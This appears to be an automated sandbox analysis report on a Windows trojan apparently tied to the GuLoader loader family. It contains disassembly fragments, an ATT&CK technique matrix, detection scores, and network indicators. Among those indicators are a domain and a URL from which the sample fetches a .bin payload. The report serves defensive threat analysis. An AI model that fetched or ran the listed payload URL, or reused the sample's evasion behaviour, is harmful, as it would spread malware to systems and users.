    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D751EF mov eax, dword ptr fs:[00000030h]5_2_36D751EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D751EF mov eax, dword ptr fs:[00000030h]5_2_36D751EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D751EF mov eax, dword ptr fs:[00000030h]5_2_36D751EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D751EF mov eax, dword ptr fs:[00000030h]5_2_36D751EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D751EF mov eax, dword ptr fs:[00000030h]5_2_36D751EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D751EF mov eax, dword ptr fs:[00000030h]5_2_36D751EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E011A4 mov eax, dword ptr fs:[00000030h]5_2_36E011A4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E011A4 mov eax, dword ptr fs:[00000030h]5_2_36E011A4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E011A4 mov eax, dword ptr fs:[00000030h]5_2_36E011A4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E011A4 mov eax, dword ptr fs:[00000030h]5_2_36E011A4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DA7190 mov eax, dword ptr fs:[00000030h]5_2_36DA7190
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E05180 mov eax, dword ptr fs:[00000030h]5_2_36E05180
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E05180 mov eax, dword ptr fs:[00000030h]5_2_36E05180
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D6B1B0 mov eax, dword ptr fs:[00000030h]5_2_36D6B1B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D57152 mov eax, dword ptr fs:[00000030h]5_2_36D57152
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D49148 mov eax, dword ptr fs:[00000030h]5_2_36D49148
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D49148 mov eax, dword ptr fs:[00000030h]5_2_36D49148
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D49148 mov eax, dword ptr fs:[00000030h]5_2_36D49148
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D49148 mov eax, dword ptr fs:[00000030h]5_2_36D49148
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DE3140 mov eax, dword ptr fs:[00000030h]5_2_36DE3140
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DE3140 mov eax, dword ptr fs:[00000030h]5_2_36DE3140
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DE3140 mov eax, dword ptr fs:[00000030h]5_2_36DE3140
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DE9179 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E25152 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E27120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4B136 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4B136 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4B136 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4B136 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D51131 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D51131 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E1BEE6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E1BEE6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E1BEE6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E1BEE6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4BEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4BEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D5BEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D5BEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D5BEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D5BEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D5BEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D5BEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D5BEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D5BEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D7FEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DDFEC5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D53EF4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D53EF4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D53EF4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D83EEB mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D83EEB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D83EEB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D53EE1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E09EDF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E09EDF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D57E96 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DDDE9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E0DEB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D83E8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DFDEB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DFDEB0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DFDEB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DFDEB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DFDEB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4DEA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4DEA5 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4FEA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DDDEAA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D8BE51 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D8BE51 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DF9E56 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D65E40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E0DE46 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4BE78 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4DE10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D8BE17 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E25E37 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E25E37 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E25E37 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D51E30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D51E30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E23E10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E23E10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D6DE2D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D6DE2D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D6DE2D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4BFD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DD3FD7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D81FCD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D81FCD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D81FCD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D53FC2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E0BFC0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E0BFC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E23FC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D8BFEC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D8BFEC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D8BFEC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D61F92 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D61F92 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D61F92 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D61F92 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D61F92 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D61F92 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D61F92 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D61F92 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D61F92 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D61F92 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D61F92 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D61F92 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4FF90 mov edi, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DF3F90 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DF3F90 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D91FB8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D8BFB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
MITRE ATT&CK matrix (the number before a technique is the count of matching signatures):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 1 Masquerading | OS Credential Dumping | 211 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Process Injection | 1 Virtualization/Sandbox Evasion | LSASS Memory | 1 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Clipboard Data | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Access Token Manipulation | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Process Injection | NTDS | 23 System Information Discovery | Distributed Component Object Model | Input Capture | 3 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Obfuscated Files or Information | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

Source | Detection | Scanner | Label | Link
3507071243740008011.exe | 32% | ReversingLabs | Win32.Trojan.InjectorX |
3507071243740008011.exe | 100% | Avira | HEUR/AGEN.1337946 |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\nsy62D9.tmp\System.dll | 0% | ReversingLabs | |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label | Link
http://nsis.sf.net/NSIS_ErrorError | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
alfacen.com | 193.107.36.30 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://alfacen.com/jFhxxDhhDcCKVgiwlWM221.bin | false | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | 3507071243740008011.exe, 00000005.00000001.2640954527.00000000005F2000.00000020.00000001.01000000.00000006.sdmp | false | | unknown
http://www.ftp.ftp://ftp.gopher. | 3507071243740008011.exe, 00000005.00000001.2640954527.0000000000649000.00000020.00000001.01000000.00000006.sdmp | false | | unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | 3507071243740008011.exe, 00000005.00000001.2640954527.00000000005F2000.00000020.00000001.01000000.00000006.sdmp | false | | unknown
https://alfacen.com/jFhxxDhhDcCKVgiwlWM221.binL | 3507071243740008011.exe, 00000005.00000003.3040973789.0000000006CC3000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.3040929745.0000000006CBB000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.2880153523.0000000006CC7000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.3041155359.0000000006CC3000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.2880232804.0000000006CC7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://nsis.sf.net/NSIS_ErrorError | 3507071243740008011.exe, 00000000.00000000.1711380790.000000000040A000.00000008.00000001.01000000.00000003.sdmp, 3507071243740008011.exe, 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 3507071243740008011.exe, 00000005.00000000.2638137136.000000000040A000.00000008.00000001.01000000.00000003.sdmp | false | URL Reputation: safe | unknown
https://alfacen.com/ | 3507071243740008011.exe, 00000005.00000003.3040973789.0000000006CC3000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.3040929745.0000000006CBB000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.2880153523.0000000006CC7000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.3041155359.0000000006CC3000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.2880232804.0000000006CC7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://alfacen.com/R | 3507071243740008011.exe, 00000005.00000003.3040973789.0000000006CC3000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.3040929745.0000000006CBB000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.2880153523.0000000006CC7000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.3041155359.0000000006CC3000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.2880232804.0000000006CC7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | 3507071243740008011.exe, 00000005.00000001.2640954527.0000000000649000.00000020.00000001.01000000.00000006.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
193.107.36.30 | alfacen.com | Bulgaria | 201200 | SUPERHOSTING_ASBG | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1538168
Start date and time: 2024-10-20 17:55:46 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 17s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 3507071243740008011.exe
Detection: MAL
Classification: mal80.troj.evad.winEXE@2/8@1/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 48
• Number of non-executed functions: 306
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: 3507071243740008011.exe
                      No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
193.107.36.30 | Potwierdzenie.exe | malicious | GuLoader |
 | Potwierdzenie.exe | malicious | GuLoader |
 | SKM_C16024100408500.vbs | malicious | GuLoader |
 | SKM_C25024100408500.vbs | malicious | GuLoader |

Match | Associated Sample Name / URL | Detection | Threat Name | Context
alfacen.com | Potwierdzenie.exe | malicious | GuLoader | 193.107.36.30
 | Potwierdzenie.exe | malicious | GuLoader | 193.107.36.30
 | SKM_C16024100408500.vbs | malicious | GuLoader | 193.107.36.30
 | SKM_C25024100408500.vbs | malicious | GuLoader | 193.107.36.30

Match | Associated Sample Name / URL | Detection | Threat Name | Context
SUPERHOSTING_ASBG | Potwierdzenie.exe | malicious | GuLoader | 193.107.36.30
 | Potwierdzenie.exe | malicious | GuLoader | 193.107.36.30
 | SKM_C16024100408500.vbs | malicious | GuLoader | 193.107.36.30
 | SKM_C25024100408500.vbs | malicious | GuLoader | 193.107.36.30
 | Atlanta Office Interiors #024-010.pdf | malicious | Unknown | 185.45.66.155
 | https://ipexcel-my.sharepoint.com/:u:/p/bhaskar/EXkHa_fTPjZKq-NlTqXIh7sBrIzBSy8pqbKPLGCEzX2rbA | malicious | Unknown | 185.45.66.155
 | Arcadia Aerospace Industries LLC (Code qJG7x-ZymK9p-KYuh).html | malicious | Unknown | 193.107.36.200
 | is homemade pepper spray legal uk 42639.js | malicious | GookitLoader | 185.45.67.220
 | gUJak0onLk.elf | malicious | Unknown | 195.191.149.33

Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | Unlock_Tool_2.3.1.exe | malicious | Vidar | 193.107.36.30
 | aZm1EZ2IYr.exe | malicious | Vidar | 193.107.36.30
 | Unlock_Tool_2.4.exe | malicious | Vidar | 193.107.36.30
 | JuyR4wj8av.exe | malicious | Stealc, Vidar | 193.107.36.30
 | SecuriteInfo.com.FileRepMalware.4445.21502.exe | malicious | Unknown | 193.107.36.30
 | yAkRyU2LPe.exe | malicious | Vidar | 193.107.36.30
 | EL7ggW7AdA.exe | malicious | Stealc, Vidar | 193.107.36.30
 | y45bCpZY1I.exe | malicious | Vidar | 193.107.36.30
 | xy894fdlWJ.exe | malicious | Vidar | 193.107.36.30

Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Local\Temp\nsy62D9.tmp\System.dll | Potwierdzenie.exe | malicious | GuLoader |
 | Potwierdzenie.exe | malicious | GuLoader |
 | RICHIESTA_OFFERTA_RDO2400423.docx.doc | malicious | GuLoader |
 | Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | malicious | Remcos, GuLoader |
 | Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | malicious | GuLoader |
 | Nutzen_Unterschrift_Planen#2024.com.exe | malicious | Remcos, GuLoader |
 | Nutzen_Unterschrift_Planen#2024.com.exe | malicious | GuLoader |
 | Benefit_Signature_Plan#3762.com.exe | malicious | Remcos, GuLoader |
 | Benefit_Signature_Plan#3762.com.exe | malicious | GuLoader |
Process: C:\Users\user\Desktop\3507071243740008011.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 11776
Entropy (8bit): 5.659026618805001
Encrypted: false
SSDEEP: 192:eX24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlqSlS:D8QIl972eXqlWBFSt273YOlqz
